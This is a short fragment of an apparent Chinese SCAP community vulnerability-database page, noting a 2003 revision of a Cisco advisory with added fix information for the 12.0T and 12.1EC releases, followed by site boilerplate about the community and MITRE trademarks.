** August 02, 2003 - Cisco has released revision 1.13 of the advisory detailing additional fix information for 12.0T and 12.1EC. See referenced advisory for additional details.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站